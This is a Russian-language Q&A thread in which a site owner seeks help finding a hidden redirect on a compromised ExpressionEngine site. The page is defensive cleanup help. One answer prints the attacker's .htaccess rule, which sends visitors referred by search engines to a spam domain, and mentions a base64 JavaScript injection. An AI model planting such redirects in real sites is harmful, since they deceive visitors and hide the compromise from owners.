Сайт Expression Engine взломан - найдите перенаправление - PullRequest
1 голос
/ 20 ноября 2011

У меня есть сайт Expression Engine, который я пытаюсь очистить.База данных получила много новых пользователей, поэтому кажется, что база данных была взломана / добавлены ссылки.Одна из проблем мэра заключается в том, что сайт при нажатии в Google обойден.Все посетители перенаправляются на другой сайт.Вот поиск: http://tinyurl.com/72nzutj.Первый сайт - это тот, о котором идет речь. Сайт, на который они перенаправлены, http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 Я пытался найти это перенаправление во всех файлах и базе данных, но мне не повезло.Это не перенаправление .htaccess, которое я проверил и подтвердил.Но я пока не смог найти редирект JScript или PHP в файлах или базе данных .. Вероятно, хорошо спрятан из-за base64 или упакованного шифрования.Идеи?

Примечание: нет чистой версии базы данных

Ответы [ 2 ]

1 голос
/ 21 ноября 2011

Перенаправления происходят с компрометации в файл .htaccess вашего сайта и влияют только на клики от популярных поисковых систем.Непосредственный доступ к сайту не оказывает никакого влияния и помогает предотвратить обнаружение вредоносного ПО.

Найдите следующий код в каталоге вашего сайта и удалите его:

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
    RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

Возможно, вам потребуется просмотреть«скрытые файлы» в вашем FTP-клиенте или используйте ls -al из командной строки для просмотра вашего .htaccess файла.

После того, как вы решите проблему, вам нужно убедиться, что выпод управлением самой последней версии ExpressionEngine ( EE 1.7.1 или EE 2.3.1 на момент написания этой статьи), а также любой сторонней Надстройки .

Аудит access_logs вашего сервера может помочь выявить уязвимость, которая привела к компрометации, и посмотреть метку времени изменения файлов в каталоге вашего сайта.

вариант этой атаки уже затронул многие установки WordPress, в результате чего крошечный фрагмент JavaScript с кодировкой base64_encoded был добавлен непосредственно перед закрывающим тегом </body>, что приводит к тому, что посетители получают вредоносное ПОЗараженный Adobe Flash Player скачать.

1 голос
/ 20 ноября 2011

Спросите своего веб-хостинга. Кажется, что входящие посетители с реферрером, отличным от сайта, перенаправляются, но вставка вашего сайта (без реферера) непосредственно в адресную строку работает.

Этот вопрос лучше решить на ServerFault или ITSecurity.

...